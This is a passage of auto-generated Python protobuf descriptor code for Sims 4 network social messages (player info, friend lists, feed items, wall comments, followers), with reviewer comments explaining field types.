full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='AccountName', full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.AccountName', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='AccountNotes', full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.AccountNotes', index=1, number=2, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='presence', full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.presence', index=2, number=3, type=14, cpp_type=8, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='OnlineStatus2', full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.OnlineStatus2', index=3, number=4, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='NucleusId', full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.NucleusId', index=4, number=9, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='PlayerBio', full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.PlayerBio', index=5, number=10, type=9, cpp_type=9, label=1, 
has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='exclude_reported', full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.exclude_reported', index=6, number=11, type=8, cpp_type=7, label=1, has_default_value=False, default_value=False, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='IsUserBlocked', full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.IsUserBlocked', index=7, number=12, type=8, cpp_type=7, label=1, has_default_value=False, default_value=False, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=501, serialized_end=724) _SOCIALPLAYERINFOLIST = descriptor.Descriptor(name='SocialPlayerInfoList', full_name='EA.Sims4.Network.SocialPlayerInfoList', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='players', full_name='EA.Sims4.Network.SocialPlayerInfoList.players', index=0, number=1, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[ _SOCIALPLAYERINFOLIST_PLAYERINFO], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=408, serialized_end=724) _SOCIALSEARCHMSG = descriptor.Descriptor(name='SocialSearchMsg', full_name='EA.Sims4.Network.SocialSearchMsg', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='prefix', full_name='EA.Sims4.Network.SocialSearchMsg.prefix', index=0, number=1, type=9, cpp_type=9, label=1, 
has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='search_results', full_name='EA.Sims4.Network.SocialSearchMsg.search_results', index=1, number=2, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=726, serialized_end=823) _ORIGINERRORMESSAGE = descriptor.Descriptor(name='OriginErrorMessage', full_name='EA.Sims4.Network.OriginErrorMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='errorcode', full_name='EA.Sims4.Network.OriginErrorMessage.errorcode', index=0, number=1, type=13, cpp_type=3, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='errormessage', full_name='EA.Sims4.Network.OriginErrorMessage.errormessage', index=1, number=2, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=825, serialized_end=886) _SOCIALINVITERESPONSEMESSAGE = descriptor.Descriptor(name='SocialInviteResponseMessage', full_name='EA.Sims4.Network.SocialInviteResponseMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='invitationid', full_name='EA.Sims4.Network.SocialInviteResponseMessage.invitationid', index=0, number=1, type=9, cpp_type=9, label=1, 
has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='invitationtype', full_name='EA.Sims4.Network.SocialInviteResponseMessage.invitationtype', index=1, number=2, type=13, cpp_type=3, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='inviternucleusid', full_name='EA.Sims4.Network.SocialInviteResponseMessage.inviternucleusid', index=2, number=3, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='accepternucleusid', full_name='EA.Sims4.Network.SocialInviteResponseMessage.accepternucleusid', index=3, number=4, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='actionSuccess', full_name='EA.Sims4.Network.SocialInviteResponseMessage.actionSuccess', index=4, number=5, type=8, cpp_type=7, label=1, has_default_value=False, default_value=False, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=889, serialized_end=1040) _SOCIALCASSANDRATEST = descriptor.Descriptor(name='SocialCassandraTest', full_name='EA.Sims4.Network.SocialCassandraTest', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='opcode', full_name='EA.Sims4.Network.SocialCassandraTest.opcode', index=0, number=1, type=14, cpp_type=8, label=1, 
has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=1042, serialized_end=1116) _SOCIALFRIENDLISTREQUESTMESSAGE = descriptor.Descriptor(name='SocialFriendListRequestMessage', full_name='EA.Sims4.Network.SocialFriendListRequestMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='account_id', full_name='EA.Sims4.Network.SocialFriendListRequestMessage.account_id', index=0, number=1, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='friend_id', full_name='EA.Sims4.Network.SocialFriendListRequestMessage.friend_id', index=1, number=2, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='address_str', full_name='EA.Sims4.Network.SocialFriendListRequestMessage.address_str', index=2, number=3, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='object_str', full_name='EA.Sims4.Network.SocialFriendListRequestMessage.object_str', index=3, number=4, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='reply_proxy_id', full_name='EA.Sims4.Network.SocialFriendListRequestMessage.reply_proxy_id', index=4, number=5, 
type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=1119, serialized_end=1255) _SOCIALREQUESTNUCLEUSIDFROMPERSONA = descriptor.Descriptor(name='SocialRequestNucleusIdFromPersona', full_name='EA.Sims4.Network.SocialRequestNucleusIdFromPersona', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='requestid', full_name='EA.Sims4.Network.SocialRequestNucleusIdFromPersona.requestid', index=0, number=1, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='personaName', full_name='EA.Sims4.Network.SocialRequestNucleusIdFromPersona.personaName', index=1, number=2, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='message_id', full_name='EA.Sims4.Network.SocialRequestNucleusIdFromPersona.message_id', index=2, number=3, type=13, cpp_type=3, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=1257, serialized_end=1352) _SOCIALNUCLEUSIDFROMPERSONARESPONSE = descriptor.Descriptor(name='SocialNucleusIdFromPersonaResponse', full_name='EA.Sims4.Network.SocialNucleusIdFromPersonaResponse', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='requestid', 
full_name='EA.Sims4.Network.SocialNucleusIdFromPersonaResponse.requestid', index=0, number=1, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='nucleusid', full_name='EA.Sims4.Network.SocialNucleusIdFromPersonaResponse.nucleusid', index=1, number=2, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='message_id', full_name='EA.Sims4.Network.SocialNucleusIdFromPersonaResponse.message_id', index=2, number=3, type=13, cpp_type=3, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=1354, serialized_end=1448) _SOCIALEXCHANGEMESSAGE = descriptor.Descriptor(name='SocialExchangeMessage', full_name='EA.Sims4.Network.SocialExchangeMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='envelope', full_name='EA.Sims4.Network.SocialExchangeMessage.envelope', index=0, number=1, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=1450, serialized_end=1533) _SOCIALFOLLOWERSMESSAGE = descriptor.Descriptor(name='SocialFollowersMessage', full_name='EA.Sims4.Network.SocialFollowersMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='sfim_blob', 
full_name='EA.Sims4.Network.SocialFollowersMessage.sfim_blob', index=0, number=1, type=12, cpp_type=9, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=1535, serialized_end=1578) _SOCIALFEEDITEMMESSAGE = descriptor.Descriptor(name='SocialFeedItemMessage', full_name='EA.Sims4.Network.SocialFeedItemMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='feed_id', full_name='EA.Sims4.Network.SocialFeedItemMessage.feed_id', index=0, number=1, type=12, cpp_type=9, label=1, has_default_value=False, default_value=b'', message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='feed_type', full_name='EA.Sims4.Network.SocialFeedItemMessage.feed_type', index=1, number=2, type=14, cpp_type=8, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='metadata', full_name='EA.Sims4.Network.SocialFeedItemMessage.metadata', index=2, number=3, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='nucleusid', full_name='EA.Sims4.Network.SocialFeedItemMessage.nucleusid', index=3, number=4, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='persona', full_name='EA.Sims4.Network.SocialFeedItemMessage.persona', index=4, number=5, type=9, cpp_type=9, 
label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='quantity', full_name='EA.Sims4.Network.SocialFeedItemMessage.quantity', index=5, number=6, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='follower_nucleusid', full_name='EA.Sims4.Network.SocialFeedItemMessage.follower_nucleusid', index=6, number=7, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='follower_persona', full_name='EA.Sims4.Network.SocialFeedItemMessage.follower_persona', index=7, number=8, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='followers_blob', full_name='EA.Sims4.Network.SocialFeedItemMessage.followers_blob', index=8, number=9, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='is_maxis_curated', full_name='EA.Sims4.Network.SocialFeedItemMessage.is_maxis_curated', index=9, number=10, type=8, cpp_type=7, label=1, has_default_value=False, default_value=False, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=1581, serialized_end=1928) 
# --- Auto-generated protobuf message descriptors (EA.Sims4.Network social wall/feed messages). ---
# NOTE(review): this looks like generated protoc output (likely decompiled) — do not hand-edit field
# numbers or the serialized_start/serialized_end offsets; they index into this module's serialized
# file descriptor (DESCRIPTOR) and must be regenerated from the .proto together.
# Protobuf type codes used below: type=4 uint64, type=8 bool, type=9 string, type=11 message,
# type=12 bytes, type=13 uint32; label=1 optional, label=3 repeated.
# A feed item whose payload is carried as an opaque serialized blob: feed_id (bytes), data (bytes), count_override (uint64).
_SOCIALFEEDITEMUNSERIALIZEDMESSAGE = descriptor.Descriptor(name='SocialFeedItemUnserializedMessage', full_name='EA.Sims4.Network.SocialFeedItemUnserializedMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='feed_id', full_name='EA.Sims4.Network.SocialFeedItemUnserializedMessage.feed_id', index=0, number=1, type=12, cpp_type=9, label=1, has_default_value=False, default_value=b'', message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='data', full_name='EA.Sims4.Network.SocialFeedItemUnserializedMessage.data', index=1, number=2, type=12, cpp_type=9, label=1, has_default_value=False, default_value=b'', message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='count_override', full_name='EA.Sims4.Network.SocialFeedItemUnserializedMessage.count_override', index=2, number=3, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=1930, serialized_end=2020)
# One comment on a gallery item's wall: uuid (bytes), author_id (uint64), author_persona (string), message (string).
_SOCIALWALLCOMMENTMESSAGE = descriptor.Descriptor(name='SocialWallCommentMessage', full_name='EA.Sims4.Network.SocialWallCommentMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='uuid', full_name='EA.Sims4.Network.SocialWallCommentMessage.uuid', index=0, number=1, type=12, cpp_type=9, label=1, has_default_value=False, default_value=b'', message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='author_id', full_name='EA.Sims4.Network.SocialWallCommentMessage.author_id', index=1, number=2, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='author_persona', full_name='EA.Sims4.Network.SocialWallCommentMessage.author_persona', index=2, number=3, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='message', full_name='EA.Sims4.Network.SocialWallCommentMessage.message', index=3, number=4, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=2022, serialized_end=2122)
# Paged wall-comment query and its response: request keys (nucleusid, gallery_id, starting_uuid, num_results)
# plus the returned repeated 'messages' and flags (hidden, exclude_reported) in the same message.
_SOCIALGETWALLCOMMENTSMESSAGE = descriptor.Descriptor(name='SocialGetWallCommentsMessage', full_name='EA.Sims4.Network.SocialGetWallCommentsMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='nucleusid', full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.nucleusid', index=0, number=1, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='gallery_id', full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.gallery_id', index=1, number=2, type=12, cpp_type=9, label=1, has_default_value=False, default_value=b'', message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='starting_uuid', full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.starting_uuid', index=2, number=3, type=12, cpp_type=9, label=1, has_default_value=False, default_value=b'', message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='num_results', full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.num_results', index=3, number=4, type=13, cpp_type=3, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='messages', full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.messages', index=4, number=5, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='hidden', full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.hidden', index=5, number=6, type=8, cpp_type=7, label=1, has_default_value=False, default_value=False, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='exclude_reported', full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.exclude_reported', index=6, number=7, type=8, cpp_type=7, label=1, has_default_value=False, default_value=False, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=2125, serialized_end=2342)
# Post one wall comment: nucleusid (uint64), gallery_id (bytes), message (sub-message — presumably a SocialWallCommentMessage; resolved elsewhere in this generated module, TODO confirm).
_SOCIALPOSTWALLCOMMENTMESSAGE = descriptor.Descriptor(name='SocialPostWallCommentMessage', full_name='EA.Sims4.Network.SocialPostWallCommentMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='nucleusid', full_name='EA.Sims4.Network.SocialPostWallCommentMessage.nucleusid', index=0, number=1, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='gallery_id', full_name='EA.Sims4.Network.SocialPostWallCommentMessage.gallery_id', index=1, number=2, type=12, cpp_type=9, label=1, has_default_value=False, default_value=b'', message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='message', full_name='EA.Sims4.Network.SocialPostWallCommentMessage.message', index=2, number=3, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=2345, serialized_end=2475)
# Delete one wall comment, addressed by (nucleusid, gallery_id, comment uuid).
_SOCIALDELETEWALLCOMMENTMESSAGE = descriptor.Descriptor(name='SocialDeleteWallCommentMessage', full_name='EA.Sims4.Network.SocialDeleteWallCommentMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='nucleusid', full_name='EA.Sims4.Network.SocialDeleteWallCommentMessage.nucleusid', index=0, number=1, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='gallery_id', full_name='EA.Sims4.Network.SocialDeleteWallCommentMessage.gallery_id', index=1, number=2, type=12, cpp_type=9, label=1, has_default_value=False, default_value=b'', message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='uuid', full_name='EA.Sims4.Network.SocialDeleteWallCommentMessage.uuid', index=2, number=3, type=12, cpp_type=9, label=1, has_default_value=False, default_value=b'', message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=2477, serialized_end=2562)
# Paged feed-wall fetch: ending_uuid cursor, repeated serialized ('messages') and unserialized feed items, num_items (uint32).
_SOCIALREQUESTFEEDWALLMESSAGE = descriptor.Descriptor(name='SocialRequestFeedWallMessage', full_name='EA.Sims4.Network.SocialRequestFeedWallMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='ending_uuid', full_name='EA.Sims4.Network.SocialRequestFeedWallMessage.ending_uuid', index=0, number=1, type=12, cpp_type=9, label=1, has_default_value=False, default_value=b'', message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='messages', full_name='EA.Sims4.Network.SocialRequestFeedWallMessage.messages', index=1, number=2, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='unserialized_messages', full_name='EA.Sims4.Network.SocialRequestFeedWallMessage.unserialized_messages', index=2, number=3, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='num_items', full_name='EA.Sims4.Network.SocialRequestFeedWallMessage.num_items', index=3, number=4, type=13, cpp_type=3, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=2565, serialized_end=2778)
# Paged follower-list request: playerid (uint64), id (string), prev_last_persona cursor (string), num_request page size (uint32).
_SOCIALREQUESTFOLLOWERSMESSAGE = descriptor.Descriptor(name='SocialRequestFollowersMessage', full_name='EA.Sims4.Network.SocialRequestFollowersMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='playerid', full_name='EA.Sims4.Network.SocialRequestFollowersMessage.playerid', index=0, number=1, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='id', full_name='EA.Sims4.Network.SocialRequestFollowersMessage.id', index=1, number=2, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='prev_last_persona', full_name='EA.Sims4.Network.SocialRequestFollowersMessage.prev_last_persona', index=2, number=3, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='num_request', full_name='EA.Sims4.Network.SocialRequestFollowersMessage.num_request', index=3, number=4, type=13, cpp_type=3, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=2780, serialized_end=2889)
# Ignore-list request keyed by the requesting player's nucleus id (presumably an EA Origin/Nucleus account id — TODO confirm).
_SOCIALREQUESTIGNORELISTMESSAGE = descriptor.Descriptor(name='SocialRequestIgnoreListMessage', full_name='EA.Sims4.Network.SocialRequestIgnoreListMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='player_nucleus_id', full_name='EA.Sims4.Network.SocialRequestIgnoreListMessage.player_nucleus_id', index=0, number=1, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=2891, serialized_end=2950)
# Nested PlayerInfo entry (SocialGetPlayerInfoListMessage.PlayerInfo): nucleus_id plus origin/first-party persona names.
_SOCIALGETPLAYERINFOLISTMESSAGE_PLAYERINFO = descriptor.Descriptor(name='PlayerInfo', full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage.PlayerInfo', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='nucleus_id', full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage.PlayerInfo.nucleus_id', index=0, number=1, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='origin_persona', full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage.PlayerInfo.origin_persona', index=1, number=2, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='first_party_persona', full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage.PlayerInfo.first_party_persona', index=2, number=3, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=3101, serialized_end=3186)
# Player-info list lookup: requester's player_nucleus_id plus a repeated player_info_list of the nested PlayerInfo above.
_SOCIALGETPLAYERINFOLISTMESSAGE = descriptor.Descriptor(name='SocialGetPlayerInfoListMessage', full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='player_nucleus_id', full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage.player_nucleus_id', index=0, number=1, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='player_info_list', full_name='EA.Sims4.Network.SocialGetPlayerInfoListMessage.player_info_list', index=1, number=2, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[ _SOCIALGETPLAYERINFOLISTMESSAGE_PLAYERINFO], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=2953, serialized_end=3186)
# Report/petition a comment: nucleusid (uint64), commentid (bytes), commentKey (string).
